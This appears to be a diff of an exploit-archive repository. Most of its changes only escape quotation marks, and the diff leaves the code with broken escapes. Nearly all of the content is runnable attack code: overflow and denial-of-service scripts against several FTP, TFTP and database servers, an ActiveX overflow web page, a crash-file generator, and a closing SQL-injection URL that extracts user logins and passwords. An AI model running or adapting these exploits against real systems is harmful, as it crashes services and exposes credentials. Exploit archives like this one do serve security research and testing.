 	if ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
-		printf("Failed\n[-] Socket error\n");
+		printf(\"Failed\\n[-] Socket error\\n\");
 		return 1;
 	}
 	sock_addr.sin_family = PF_INET;
 	sock_addr.sin_port = htons(atoi(argv[2]));
 	sock_addr.sin_addr = *((struct in_addr *)he->h_addr);
-	memset(&(sock_addr.sin_zero), '\0', 8);
+	memset(&(sock_addr.sin_zero), \'\\0\', 8);
 	if (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
-		printf("Failed\n[-] Sorry, cannot connect to %s:%s. Error: %i\n", argv[1],argv[2],WSAGetLastError());
+		printf(\"Failed\\n[-] Sorry, cannot connect to %s:%s. Error: %i\\n\", argv[1],argv[2],WSAGetLastError());
 		return 1;
 	}
-	printf("OK\n");
+	printf(\"OK\\n\");
-	memset(recvbuff,'\0',1024);
+	memset(recvbuff,\'\\0\',1024);
 	recv(ftpsock, recvbuff, 1024, 0);
-	printf("[+] Building payload ... ");
+	printf(\"[+] Building payload ... \");
-	memset(evilbuff,'A',buflen);
+	memset(evilbuff,\'A\',buflen);
-	memset(evilbuff+585,'B',4);	//eax and edx will be 42424262
+	memset(evilbuff+585,\'B\',4);	//eax and edx will be 42424262
-	memcpy(evilbuff,"USER ",5);
+	memcpy(evilbuff,\"USER \",5);
-	memcpy(evilbuff+buflen,"\r\n\0",3);
+	memcpy(evilbuff+buflen,\"\\r\\n\\0\",3);
-	printf("OK\n[+] Sending USER ... ");
+	printf(\"OK\\n[+] Sending USER ... \");
 	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
-		printf("Failed\n[-] Could not send\n");
+		printf(\"Failed\\n[-] Could not send\\n\");
 		return 1;
 	}
-	printf("OK\n");
+	printf(\"OK\\n\");
-	memset(recvbuff,'\0',1024);
+	memset(recvbuff,\'\\0\',1024);
 	recv(ftpsock, recvbuff, 1024, 0);
-	memcpy(evilbuff,"PASS ",5);
+	memcpy(evilbuff,\"PASS \",5);
-	printf("[+] Sending PASS ... ");
+	printf(\"[+] Sending PASS ... \");
 	if (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {
-		printf("Failed\n[-] Could not send\n");
+		printf(\"Failed\\n[-] Could not send\\n\");
 		return 1;
 	}
-	printf("OK\n");
+	printf(\"OK\\n\");
 	recv(ftpsock, recvbuff, 1024, 0);
-	printf("[+] Host should be down\n");
+	printf(\"[+] Host should be down\\n\");
 	return 0;
 }
--- a/platforms/windows/dos/3432.pl
+++ b/platforms/windows/dos/3432.pl
@ -20,16 +20,16 @@
 use IO::Socket;
 use strict;
-my($socket) = "";
+my($socket) = \"\";
 if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
-PeerPort => "69",
+PeerPort => \"69\",
-Proto    => "UDP"))
+Proto    => \"UDP\"))
 {
-                 print $socket "A" x 517;
+                 print $socket \"A\" x 517;
                 sleep(1);
@ -37,7 +37,7 @@ Proto    => "UDP"))
 }
 else
 {
-                 print "Cannot connect to $ARGV[0]:69\n";
+                 print \"Cannot connect to $ARGV[0]:69\\n\";
 }
 # milw0rm.com [2007-03-08]
--- a/platforms/windows/dos/3866.html
+++ b/platforms/windows/dos/3866.html
@ -1,7 +1,7 @@
-<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/07</b></p></span>
+<span style=\"font: 14pt Courier New;\"><p align=\"center\"><b>2007/05/07</b></p></span>
 <pre>
-<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------
+<code><span style=\"font: 10pt Courier New;\"><span class=\"general1-symbol\">-------------------------------------------------------------------------------------
- <b>Versalsoft HTTP File Uploader (UFileUploaderD.dll) 'AddFile' method Buffer Overflow</b>
+ <b>Versalsoft HTTP File Uploader (UFileUploaderD.dll) \'AddFile\' method Buffer Overflow</b>
 url: http://en.versalsoft.com/
 price: from $59.95 to $799.95
@ -13,25 +13,25 @@
 Try only 1500 characters (or less) to see IE crash.
 -------------------------------------------------------------------------------------
-<object classid='clsid:28776DAD-5914-42A7-9139-8FD7C756BBDD' id='target' style="width: 650px; height: 250px"></object>
+<object classid=\'clsid:28776DAD-5914-42A7-9139-8FD7C756BBDD\' id=\'target\' style=\"width: 650px; height: 250px\"></object>
-<input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <input language=VBScript onclick=QuoteMe() type=button value="Quoting...">
+<input language=VBScript onclick=tryMe() type=button value=\"Click here to start the test\"> <input language=VBScript onclick=QuoteMe() type=button value=\"Quoting...\">
-<script language='vbscript'>
+<script language=\'vbscript\'>
 Sub tryMe
  on error resume next
-  arg1 = String (4000,"A")
+  arg1 = String (4000,\"A\")
  target.AddFile arg1
 End Sub
 Sub QuoteMe
 Dim MyMsg
- MyMsg = MsgBox("I'm coming down with a fever" & vbCrLf & _
+ MyMsg = MsgBox(\"I\'m coming down with a fever\" & vbCrLf & _
-                "I'm really out to sea" & vbCrLf & _
+                \"I\'m really out to sea\" & vbCrLf & _
-                "This kettle is boiling over" & vbCrLf & _
+                \"This kettle is boiling over\" & vbCrLf & _
-                "I think I'm a banana tree", 64, "2007/05/07 - Versalsoft HTTP File Uploader")
+                \"I think I\'m a banana tree\", 64, \"2007/05/07 - Versalsoft HTTP File Uploader\")
 End Sub
-</script><b><font color="#FF0000">As you can see by the faultmon dump, EIP is overwrite so code execution should
+</script><b><font color=\"#FF0000\">As you can see by the faultmon dump, EIP is overwrite so code execution should
 be possible... but I leave to posterity the hardest part of work :)</font color></b>
 11:40:51.172  pid=08E4 tid=0AB0  EXCEPTION (first-chance)
--- a/platforms/windows/dos/40635.py
+++ b/platforms/windows/dos/40635.py
@ -0,0 +1,45 @@
 #!/usr/bin/python
 # Exploit Title: Remote buffer overflow vulnerability in uSQLite 1.0.0 PoC
 # Date: 27/10/1016
 # Exploit Author: Peter Baris
 # Software Link: https://sourceforge.net/projects/usqlite/?source=directory
 # Version: 1.0.0
 # Tested on: windows 7 and XP SP3
 # Longer strings will cause heap based overflow
 # usage:  python usqlite.py <host address>
 # Output in the debugger
 # EAX 0000038C
 # ECX 00B0DA10
 # EDX 0000038C
 # EBX 41414141
 # ESP 0028F8D0 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
 # EBP 41414141
 # ESI 41414141
 # EDI 41414141
 # EIP 42424242  <-- EIP is under control, but depending on the OS version, you might have issues finding a jump spot without DEP and ASLR.
 ###############################################################################################################################################
 import socket
 import sys
 if len(sys.argv)<=1:
 	print("Usage: python usqlite.py hostname")
 	sys.exit()
 hostname=sys.argv[1]
 port = 3002
 buffer = "A"*259+"B"*4+"C"*360
 sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 connect=sock.connect((hostname,port))
 sock.send(buffer +'\r\n')
 sock.recv(1024)
 sock.close()
--- a/platforms/windows/dos/40638.py
+++ b/platforms/windows/dos/40638.py
@ -0,0 +1,43 @@
 #!/usr/bin/python
 ### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ### 
 # Date: 2016-10-27
 # PoC Author: n30m1nd
 # Vendor Homepage: http://www.giuspen.com/cherrytree/
 # Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
 # Version: Affects all versions of CherryTree prior to 0.37.6
 # Tested on: Win7 64bit and Win10 64 bit
 # Credits
 # =======
 # Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
 # Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
 # How to
 # ======
 # * Run this python script. It will generate a "PoC-1.ctd" file.
 # * Open the file and hover over the link.
 # Bonus
 # =====
 # It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
 # Why?
 # ====
 # For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
 # trying to draw the contents of the graphical bitmaps.
 # Exploit code
 # ============
 crashfile = '''<?xml version="1.0" ?>
 <cherrytree>
    <node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
        <rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>
    </node>
 </cherrytree>
 '''
 with open("PoC-1.ctd", 'w') as f:
    f.write(crashfile)
    f.close()
--- a/platforms/windows/dos/40639.py
+++ b/platforms/windows/dos/40639.py
@ -0,0 +1,48 @@
 #!/usr/bin/python
 ### Baby FTP 1.24 - Denial of Service by n30m1nd ### 
 # Date: 2016-10-27
 # PoC Author: n30m1nd
 # Vendor Homepage: http://www.pablosoftwaresolutions.com/
 # Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
 # Version: 1.24
 # Tested on: Win7 64bit and Win10 64 bit
 # Credits
 # =======
 # Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
 # How to
 # ======
 # * Run this python script and write the IP to attack.
 # Why?
 # ====
 # The FTP Server can't handle more than ~1505 connections at the same time
 # Exploit code
 # ============
 import socket
 ip = raw_input("[+] IP to attack: ")
 sarr = []
 i = 0
 while True:
 	try:
 		sarr.append(socket.create_connection((ip,21)))
 		print "[+] Connection %d" % i
 		crash1 = "A"*500
 		sarr[i].send("USER anonymous\r\n" )
 		sarr[i].recv(4096)
 		sarr[i].send("PASS n30m1nd\r\n" )
 		sarr[i].recv(4096)
 		i+=1
 	except socket.error:
 		print "[*] Server crashed!!"
        raw_input()
 		break
--- a/Show more
+++ b/Show more
`@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a`

	`LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.`	`LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.`

	`http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1//AND//1=2//UNION//ALL//SELECT//1,2,concat(userLogin,'-',userPassword),4,5//FROM//tbl_ln_user/*`	`http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1//AND//1=2//UNION//ALL//SELECT//1,2,concat(userLogin,\'-\',userPassword),4,5//FROM//tbl_ln_user/*`